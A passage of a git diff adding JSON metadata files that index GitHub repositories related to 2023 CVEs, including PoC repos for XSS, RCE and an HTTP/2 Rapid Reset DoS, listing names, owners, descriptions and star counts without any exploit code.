"https:\/\/avatars.githubusercontent.com\/u\/102041143?v=4", + "html_url": "https:\/\/github.com\/OligoCyberSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OligoCyberSecurity\/CVE-2023-43654", + "description": "Demo for CVE-2023-43654 - Remote Code Execution in PyTorch TorchServe", + "fork": false, + "created_at": "2024-05-28T10:02:13Z", + "updated_at": "2024-07-09T11:32:21Z", + "pushed_at": "2024-06-06T08:09:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43667.json b/2023/CVE-2023-43667.json new file mode 100644 index 0000000000..38c8ad0a9c --- /dev/null +++ b/2023/CVE-2023-43667.json @@ -0,0 +1,95 @@ +[ + { + "id": 786209657, + "name": "CVE-2023-43667-2", + "full_name": "miguelc49\/CVE-2023-43667-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-43667-2", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:45Z", + "updated_at": "2024-04-14T17:40:52Z", + "pushed_at": "2024-04-15T23:51:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209678, + "name": "CVE-2023-43667-1", + "full_name": "miguelc49\/CVE-2023-43667-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-43667-1", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:51Z", + "updated_at": "2024-04-14T17:40:49Z", + "pushed_at": "2024-04-15T23:51:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786209696, + "name": "CVE-2023-43667-3", + "full_name": "miguelc49\/CVE-2023-43667-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2023-43667-3", + "description": null, + "fork": false, + "created_at": "2024-04-13T18:45:57Z", + "updated_at": "2024-04-14T17:40:59Z", + "pushed_at": "2024-04-15T23:51:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43757.json b/2023/CVE-2023-43757.json new file mode 100644 index 0000000000..05fcb21bf6 --- /dev/null +++ b/2023/CVE-2023-43757.json @@ -0,0 +1,33 @@ +[ + { + "id": 764535638, + "name": "CVE-2023-43757", + "full_name": "sharmashreejaa\/CVE-2023-43757", + "owner": { + "login": "sharmashreejaa", + "id": 161574704, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161574704?v=4", + "html_url": "https:\/\/github.com\/sharmashreejaa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharmashreejaa\/CVE-2023-43757", + "description": null, + "fork": false, + "created_at": "2024-02-28T08:58:31Z", + "updated_at": "2024-02-28T08:58:31Z", + "pushed_at": "2024-02-28T08:58:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43770.json b/2023/CVE-2023-43770.json new file mode 100644 index 0000000000..6329401c86 --- /dev/null +++ b/2023/CVE-2023-43770.json @@ -0,0 +1,64 @@ +[ + { + "id": 697409473, + "name": "CVE-2023-43770-POC", + "full_name": "s3cb0y\/CVE-2023-43770-POC", + "owner": { + "login": "s3cb0y", + "id": 43054353, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43054353?v=4", + "html_url": "https:\/\/github.com\/s3cb0y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s3cb0y\/CVE-2023-43770-POC", + "description": "A Proof-Of-Concept for the CVE-2023-43770 vulnerability. ", + "fork": false, + "created_at": "2023-09-27T17:08:23Z", + "updated_at": "2024-11-18T11:15:04Z", + "pushed_at": "2023-10-02T17:41:10Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 33, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 697793875, + "name": "CVE-2023-43770-PoC", + "full_name": "knight0x07\/CVE-2023-43770-PoC", + "owner": { + "login": "knight0x07", + "id": 60843949, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60843949?v=4", + "html_url": "https:\/\/github.com\/knight0x07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knight0x07\/CVE-2023-43770-PoC", + "description": "PoC for Stored XSS (CVE-2023-43770) Vulnerability", + "fork": false, + "created_at": "2023-09-28T13:43:25Z", + "updated_at": "2023-12-18T12:45:24Z", + "pushed_at": "2023-09-28T16:22:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43786.json b/2023/CVE-2023-43786.json new file mode 100644 index 0000000000..fbf4149148 --- /dev/null +++ b/2023/CVE-2023-43786.json @@ -0,0 +1,33 @@ +[ + { + "id": 744195023, + "name": "jfrog-CVE-2023-43786-libX11_DoS", + "full_name": "jfrog\/jfrog-CVE-2023-43786-libX11_DoS", + "owner": { + "login": "jfrog", + "id": 499942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/499942?v=4", + "html_url": "https:\/\/github.com\/jfrog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jfrog\/jfrog-CVE-2023-43786-libX11_DoS", + "description": null, + "fork": false, + "created_at": "2024-01-16T20:04:05Z", + "updated_at": "2024-01-16T20:04:05Z", + "pushed_at": "2024-01-17T05:57:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43838.json b/2023/CVE-2023-43838.json new file mode 100644 index 0000000000..f7acc36f81 --- /dev/null +++ b/2023/CVE-2023-43838.json @@ -0,0 +1,33 @@ +[ + { + "id": 699413146, + "name": "CVE-2023-43838", + "full_name": "rootd4ddy\/CVE-2023-43838", + "owner": { + "login": "rootd4ddy", + "id": 129632649, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129632649?v=4", + "html_url": "https:\/\/github.com\/rootd4ddy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rootd4ddy\/CVE-2023-43838", + "description": "Public disclosure for CVE-2023-31584.", + "fork": false, + "created_at": "2023-10-02T15:27:07Z", + "updated_at": "2023-11-28T01:28:13Z", + "pushed_at": "2023-10-02T15:32:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43871.json b/2023/CVE-2023-43871.json new file mode 100644 index 0000000000..dc0fee1808 --- /dev/null +++ b/2023/CVE-2023-43871.json @@ -0,0 +1,33 @@ +[ + { + "id": 693581070, + "name": "CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media", + "full_name": "sromanhu\/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media", + "description": "WBCE 1.6.1 is affected by File Upload - XSS vulnerability that allows attackers to upload a PDF file with a hidden XSS that when executed will launch the XSS pop-up", + "fork": false, + "created_at": "2023-09-19T10:02:34Z", + "updated_at": "2023-09-28T22:37:30Z", + "pushed_at": "2023-09-19T10:07:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43872.json b/2023/CVE-2023-43872.json new file mode 100644 index 0000000000..b3695b6b6a --- /dev/null +++ b/2023/CVE-2023-43872.json @@ -0,0 +1,33 @@ +[ + { + "id": 693577949, + "name": "CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager", + "full_name": "sromanhu\/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager", + "description": "CMSmadesimple 2.2.18 is affected by File Upload - XSS vulnerability that allows attackers to upload a PDF file with a hidden XSS that when executed will launch the XSS pop-up", + "fork": false, + "created_at": "2023-09-19T09:54:42Z", + "updated_at": "2023-09-28T22:45:40Z", + "pushed_at": "2023-09-19T10:00:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43873.json b/2023/CVE-2023-43873.json new file mode 100644 index 0000000000..f1d08f391a --- /dev/null +++ b/2023/CVE-2023-43873.json @@ -0,0 +1,33 @@ +[ + { + "id": 693584148, + "name": "CVE-2023-43873-e107-CMS-Stored-XSS---Manage", + "full_name": "sromanhu\/CVE-2023-43873-e107-CMS-Stored-XSS---Manage", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43873-e107-CMS-Stored-XSS---Manage", + "description": "e107 2.3.2 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Name field in the Manage Menu.", + "fork": false, + "created_at": "2023-09-19T10:10:13Z", + "updated_at": "2023-09-28T22:37:59Z", + "pushed_at": "2023-09-19T10:31:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43874.json b/2023/CVE-2023-43874.json new file mode 100644 index 0000000000..272bdfb53c --- /dev/null +++ b/2023/CVE-2023-43874.json @@ -0,0 +1,33 @@ +[ + { + "id": 693589060, + "name": "CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags", + "full_name": "sromanhu\/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags", + "description": "e107 2.3.2 is affected by a Multiple Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Copyright and Author field in the Meta & Custom Tags Menu.", + "fork": false, + "created_at": "2023-09-19T10:23:08Z", + "updated_at": "2023-09-28T22:38:18Z", + "pushed_at": "2023-09-19T10:29:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43875.json b/2023/CVE-2023-43875.json new file mode 100644 index 0000000000..695fd49bc1 --- /dev/null +++ b/2023/CVE-2023-43875.json @@ -0,0 +1,33 @@ +[ + { + "id": 693884199, + "name": "CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation", + "full_name": "sromanhu\/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation", + "description": "Subrion CMS 4.2.1 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation process.", + "fork": false, + "created_at": "2023-09-19T22:58:33Z", + "updated_at": "2023-09-28T22:38:33Z", + "pushed_at": "2023-09-19T23:03:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43876.json b/2023/CVE-2023-43876.json new file mode 100644 index 0000000000..e85886c735 --- /dev/null +++ b/2023/CVE-2023-43876.json @@ -0,0 +1,33 @@ +[ + { + "id": 693885753, + "name": "CVE-2023-43876-October-CMS-Reflected-XSS---Installation", + "full_name": "sromanhu\/CVE-2023-43876-October-CMS-Reflected-XSS---Installation", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43876-October-CMS-Reflected-XSS---Installation", + "description": "October CMS 3.4.16 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation process.", + "fork": false, + "created_at": "2023-09-19T23:05:11Z", + "updated_at": "2023-09-28T22:38:47Z", + "pushed_at": "2023-09-19T23:08:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43877.json b/2023/CVE-2023-43877.json new file mode 100644 index 0000000000..104dde77f8 --- /dev/null +++ b/2023/CVE-2023-43877.json @@ -0,0 +1,33 @@ +[ + { + "id": 695139320, + "name": "CVE-2023-43877-RiteCMS-Stored-XSS---Home", + "full_name": "sromanhu\/CVE-2023-43877-RiteCMS-Stored-XSS---Home", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43877-RiteCMS-Stored-XSS---Home", + "description": " RiteCMS 3.0 is affected by a Multiple Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Home settings page in the Administration Menu", + "fork": false, + "created_at": "2023-09-22T12:47:49Z", + "updated_at": "2023-09-28T22:42:34Z", + "pushed_at": "2023-09-22T13:04:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43878.json b/2023/CVE-2023-43878.json new file mode 100644 index 0000000000..aeff858638 --- /dev/null +++ b/2023/CVE-2023-43878.json @@ -0,0 +1,33 @@ +[ + { + "id": 695147163, + "name": "CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu", + "full_name": "sromanhu\/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu", + "description": "RiteCMS 3.0 is affected by a Multiple Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Main Menu - Items in the Administration Menu", + "fork": false, + "created_at": "2023-09-22T13:07:44Z", + "updated_at": "2023-09-28T22:43:03Z", + "pushed_at": "2023-09-22T13:12:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43879.json b/2023/CVE-2023-43879.json new file mode 100644 index 0000000000..6e9199e92e --- /dev/null +++ b/2023/CVE-2023-43879.json @@ -0,0 +1,33 @@ +[ + { + "id": 695149706, + "name": "CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent", + "full_name": "sromanhu\/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent", + "description": "About RiteCMS 3.0 is affected by a Multiple Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Global Content Blocks in the Administration Menu", + "fork": false, + "created_at": "2023-09-22T13:14:02Z", + "updated_at": "2023-09-28T22:43:22Z", + "pushed_at": "2023-09-22T13:17:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-43955.json b/2023/CVE-2023-43955.json new file mode 100644 index 0000000000..2faaf17f80 --- /dev/null +++ b/2023/CVE-2023-43955.json @@ -0,0 +1,35 @@ +[ + { + "id": 689433745, + "name": "com.phlox.tvwebbrowser", + "full_name": "actuator\/com.phlox.tvwebbrowser", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.phlox.tvwebbrowser", + "description": "CVE-2023-43955", + "fork": false, + "created_at": "2023-09-09T19:41:46Z", + "updated_at": "2024-01-17T19:59:18Z", + "pushed_at": "2023-11-07T16:45:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-43955" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44061.json b/2023/CVE-2023-44061.json new file mode 100644 index 0000000000..b65e23699f --- /dev/null +++ b/2023/CVE-2023-44061.json @@ -0,0 +1,33 @@ +[ + { + "id": 695430538, + "name": "CVE-2023-44061", + "full_name": "SoundarXploit\/CVE-2023-44061", + "owner": { + "login": "SoundarXploit", + "id": 26168410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26168410?v=4", + "html_url": "https:\/\/github.com\/SoundarXploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SoundarXploit\/CVE-2023-44061", + "description": " CVE-2023-44061 - Simple and Nice Shopping Cart Script V1.0", + "fork": false, + "created_at": "2023-09-23T06:45:32Z", + "updated_at": "2023-09-28T03:40:09Z", + "pushed_at": "2023-09-23T13:50:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4427.json b/2023/CVE-2023-4427.json new file mode 100644 index 0000000000..ea24220892 --- /dev/null +++ b/2023/CVE-2023-4427.json @@ -0,0 +1,33 @@ +[ + { + "id": 753386331, + "name": "CVE-2023-4427", + "full_name": "tianstcht\/CVE-2023-4427", + "owner": { + "login": "tianstcht", + "id": 32213198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32213198?v=4", + "html_url": "https:\/\/github.com\/tianstcht", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tianstcht\/CVE-2023-4427", + "description": null, + "fork": false, + "created_at": "2024-02-06T02:29:06Z", + "updated_at": "2024-11-20T16:30:39Z", + "pushed_at": "2024-02-06T02:59:15Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44451.json b/2023/CVE-2023-44451.json new file mode 100644 index 0000000000..402fc916df --- /dev/null +++ b/2023/CVE-2023-44451.json @@ -0,0 +1,33 @@ +[ + { + "id": 744352278, + "name": "slippy-book-exploit", + "full_name": "febinrev\/slippy-book-exploit", + "owner": { + "login": "febinrev", + "id": 52229330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4", + "html_url": "https:\/\/github.com\/febinrev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/febinrev\/slippy-book-exploit", + "description": " CVE-2023-44451, CVE-2023-52076: RCE Vulnerability affected popular Linux Distros including Mint, Kali, Parrot, Manjaro etc. EPUB File Parsing Directory Traversal Remote Code Execution", + "fork": false, + "created_at": "2024-01-17T05:50:38Z", + "updated_at": "2024-12-17T14:43:58Z", + "pushed_at": "2024-01-17T10:42:12Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44452.json b/2023/CVE-2023-44452.json new file mode 100644 index 0000000000..6136a85c96 --- /dev/null +++ b/2023/CVE-2023-44452.json @@ -0,0 +1,33 @@ +[ + { + "id": 744427098, + "name": "atril_cbt-inject-exploit", + "full_name": "febinrev\/atril_cbt-inject-exploit", + "owner": { + "login": "febinrev", + "id": 52229330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4", + "html_url": "https:\/\/github.com\/febinrev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/febinrev\/atril_cbt-inject-exploit", + "description": "CVE-2023-44452, CVE-2023-51698: CBT File Parsing Argument Injection that affected Popular Linux Distros", + "fork": false, + "created_at": "2024-01-17T09:26:16Z", + "updated_at": "2024-03-06T04:43:54Z", + "pushed_at": "2024-01-17T09:36:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44487.json b/2023/CVE-2023-44487.json new file mode 100644 index 0000000000..2224840ca8 --- /dev/null +++ b/2023/CVE-2023-44487.json @@ -0,0 +1,472 @@ +[ + { + "id": 703062371, + "name": "CVE-2023-44487", + "full_name": "bcdannyboy\/CVE-2023-44487", + "owner": { + "login": "bcdannyboy", + "id": 12553297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12553297?v=4", + "html_url": "https:\/\/github.com\/bcdannyboy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bcdannyboy\/CVE-2023-44487", + "description": "Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487", + "fork": false, + "created_at": "2023-10-10T14:20:42Z", + "updated_at": "2025-01-02T01:39:15Z", + "pushed_at": "2024-01-08T11:12:08Z", + "stargazers_count": 226, + "watchers_count": 226, + "has_discussions": false, + "forks_count": 49, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 49, + "watchers": 226, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 703303512, + "name": "CVE-2023-44487", + "full_name": "imabee101\/CVE-2023-44487", + "owner": { + "login": "imabee101", + "id": 29169122, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29169122?v=4", + "html_url": "https:\/\/github.com\/imabee101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imabee101\/CVE-2023-44487", + "description": "Proof of concept for DoS exploit ", + "fork": false, + "created_at": "2023-10-11T01:59:47Z", + "updated_at": "2024-10-11T01:41:10Z", + "pushed_at": "2023-10-13T11:19:10Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-44487", + "ddos", + "dos", + "dos-attack", + "poc", + "proof-of-concept" + ], + "visibility": "public", + "forks": 16, + "watchers": 52, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 703845749, + "name": "CVE-2023-44487", + "full_name": "ByteHackr\/CVE-2023-44487", + "owner": { + "login": "ByteHackr", + "id": 30409831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30409831?v=4", + "html_url": "https:\/\/github.com\/ByteHackr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ByteHackr\/CVE-2023-44487", + "description": "Test Script for CVE-2023-44487", + "fork": false, + "created_at": "2023-10-12T03:14:34Z", + "updated_at": "2023-10-12T03:30:38Z", + "pushed_at": "2023-10-12T03:30:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 703914770, + "name": "rapidreset", + "full_name": "pabloec20\/rapidreset", + "owner": { + "login": "pabloec20", + "id": 24191742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24191742?v=4", + "html_url": "https:\/\/github.com\/pabloec20", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pabloec20\/rapidreset", + "description": "CVE-2023-44487", + "fork": false, + "created_at": "2023-10-12T07:06:42Z", + "updated_at": "2024-06-27T16:58:23Z", + "pushed_at": "2023-10-12T07:11:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704732969, + "name": "rapidresetclient", + "full_name": "secengjeff\/rapidresetclient", + "owner": { + "login": "secengjeff", + "id": 146767590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146767590?v=4", + "html_url": "https:\/\/github.com\/secengjeff", + "user_view_type": "public" + }, + "html_url": 